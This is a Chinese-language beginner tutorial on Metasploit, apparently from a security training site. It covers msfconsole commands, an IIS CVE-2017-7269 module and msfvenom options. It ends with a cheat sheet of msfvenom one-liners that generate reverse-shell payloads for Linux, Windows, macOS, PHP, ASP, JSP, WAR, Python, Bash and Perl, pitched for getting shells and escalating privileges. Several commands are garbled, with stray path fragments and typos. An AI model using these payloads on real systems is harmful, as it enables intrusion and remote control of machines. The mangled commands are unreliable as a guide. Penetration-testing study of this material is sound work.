1、 msf的基礎介紹
kali是默認集成了mepasploit framework,簡稱為msf,不同的框架下,它有不同的模塊,不同的模塊之間,互相交流彼此生產輸入輸出的數據,第一個模塊生成的數據可以給第二個或者第三個模塊去直接拿來使用,原因是它拿來使用的是後臺有數據庫,其它的版本後面也有數據庫,比如說我們掃描的目標系統,掃描下來的信息,比如說開放了哪些端口,哪些信息,都會存到數據庫裡面,而measploit framework用的是postgresql數據庫來進行存儲。
早期的msf版本需要先啟動數據庫再啟動msf
2)msf的基本機構
3)、msf的基礎操作和命令
在這裡的話,我們打開kali的終端,輸入msfconsole打開msf的界面,因為kali系統是自帶的msf工具,執行命令之後,它這裡會進行一個初始化,接著就可以看見msf的命令行界面
4)msf中專業術語,因為在msf中,這些都是常見的專業術語,也是必要的
– Exploit,攻擊工具/代碼
– Payload,攻擊載荷
– Shellcode
– Module,模塊
– Listener,監聽器
5)、常用命令
showpayloads (show 可以理解為顯示的意思), 查看所有可用的滲透攻擊程序代碼
show auxiliary – 查看所有可用的輔助攻擊工具,然後就可以看見顯示出相對應的輔助工具
Use exploist/windows/iis/cve_2017_7269 進入相對應的模塊,比如說我進入了cve_2017_7269漏洞模塊,接著就可以看見它這裡進入了
show options – 查看該模塊所有可用選項,比如說我們進入cve_2017_7269漏洞模塊,執行攻擊的話,需要配置該模塊的一些選項
show payloads – 查看該模塊適用的所有載荷代碼,然後就可以顯示出相對應的payload
show targets – 查看該模塊適用的攻擊目標類型
search ssh - 根據關鍵字搜索某模塊,比如說我搜索ssh相對應的漏洞模塊,就可以看見顯示出相對應的ssh關鍵詞的模塊
info – 顯示某模塊的詳細信息
bach –退出當前進行的模塊
6)msfvenom (攻擊載荷生成和編碼器)
主要參數:
-p payload
-e 編碼方式
-i 編碼次數
-b 在生成的程序中避免出現的值
LHOST,LPORT 監聽上線的主機IP和端口
-f exe 生成EXE格式
使用msfvenom -l 可以查看可以利用payload
msfvenom -l | grep windows | grep x64 | grep tcp 選擇payload
7)、在Linux命令下,執行msf命令生成可執行的文件,這些文件用來反彈shell用於提權,各種可執行的腳本命令如下。
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your> LPORT=<your> -f elf > shell.elf/<your>/<your>
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your> LPORT=<your> -f exe > shell.exe/<your>/<your>
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<your> LPORT=<your> -f macho > shell.macho/<your>/<your>
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<your> LPORT=<your> -f raw > shell.php/<your>/<your>
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your> LPORT=<your> -f asp > shell.asp/<your>/<your>
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your> LPORT=<your> -f raw > shell.jsp/<your>/<your>
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your> LPORT=<your> -f war > shell.war/<your>/<your>
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<your> LPORT=<your> -f raw > shell.py/<your>/<your>
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<your> LPORT=<your> -f raw > shell.sh/<your>/<your>
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<your> LPORT=<your> -f raw > shell.pl/<your>/<your>
最後喜歡我文章的朋友請加圈子關注我們,私信關鍵詞:學習。(送免費資料和優惠券)
就會自動分享給你微信號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網絡安全技能一直是我們的初衷和願景,讓我們共同成為守護信息世界的"SaFeMAN"。
還有可以關注我們微信公眾號,在公眾號上輸入安界網,就可以關注到我們,領取資料和優惠券
閱讀更多 安界 的文章